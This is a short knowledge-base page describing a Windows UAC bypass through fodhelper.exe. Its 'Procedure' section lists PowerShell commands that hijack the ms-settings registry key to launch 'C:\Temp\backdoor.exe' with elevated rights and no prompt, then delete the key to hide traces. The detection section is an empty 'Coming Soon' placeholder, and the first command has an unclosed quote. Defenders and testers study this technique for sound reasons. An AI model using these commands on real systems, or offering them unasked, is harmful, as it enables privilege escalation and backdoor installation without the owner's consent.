UAC Bypass

UAC Bypass technique I - fodhelper.exe

Procedure

PS> $command = "C:\Temp\backdoor.exe
PS> New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
PS> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
PS> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $command -Force
PS> Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
PS> Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Technical Context

The process of foldhelper will be running as high integrity to perform tasks like typing, text to speech, such kind of Windows Features. @winscripting discovered that the fodhelper process will look for some registry keys which could be leveraged to execute code. The registry paths are:

HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute

Analytic I

Coming Soon

Reference

Last updated

Was this helpful?